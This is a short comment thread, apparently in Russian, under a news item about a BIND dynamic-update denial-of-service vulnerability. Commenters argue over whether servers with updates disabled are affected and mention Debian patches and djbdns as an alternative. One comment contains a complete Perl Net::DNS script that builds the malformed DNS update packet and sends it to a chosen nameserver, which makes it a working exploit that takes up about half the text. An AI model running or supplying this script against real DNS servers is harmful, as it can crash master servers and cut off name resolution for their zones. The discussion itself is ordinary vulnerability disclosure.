Comments 4
This vulnerability affects all servers that are masters for one or more zones – it is not limited to those that are configured to allow dynamic updates.
+3
Сервера, на которых динамический обновления не используются и запрещены, уязвимости, естественно, не подвержены.
не верно — даже если апдейты запрещены — уязвимость присутствует.(хотя редхат в багтрекере и заявил обратное)
вот скрипт, который генерит бажный пакет:
use Net::DNS;
our $NSI = '';
our $NSI_KEY_NAME = '';
our $NSI_KEY = '';
my $rzone = '';
my $rptr = «1.$rzone»;
my $packet = Net::DNS::Update->new($rzone);
$packet->push(
pre => Net::DNS::RR->new(
Name => $rptr,
Class => 'IN',
Type => 'ANY',
TTL => 0,
)
);
$packet->push(
update => Net::DNS::RR->new(
Name => $rptr,
Class => 'ANY',
Type => 'ANY',
)
);
$packet->sign_tsig( $NSI_KEY_NAME, $NSI_KEY ) if $NSI_KEY_NAME && $NSI_KEY;
print $packet->string;
Net::DNS::Resolver->new( nameservers => [$NSI] )->send($packet);
+4
Для дебиана пакеты уже обновлены.
0
… причём обновляйтесь сразу на djbdns или любой другой нормальный dns-сервер, у которого нет такой богатой истории дыр в безопасности как у bind.
BIND, the Buggy Internet Name Daemon
Ease of use: BIND versus djbdns
BIND, the Buggy Internet Name Daemon
Ease of use: BIND versus djbdns
0
Sign up to leave a comment.
ISC анонсирует новую уязвимость BIND: Dynamic Update DoS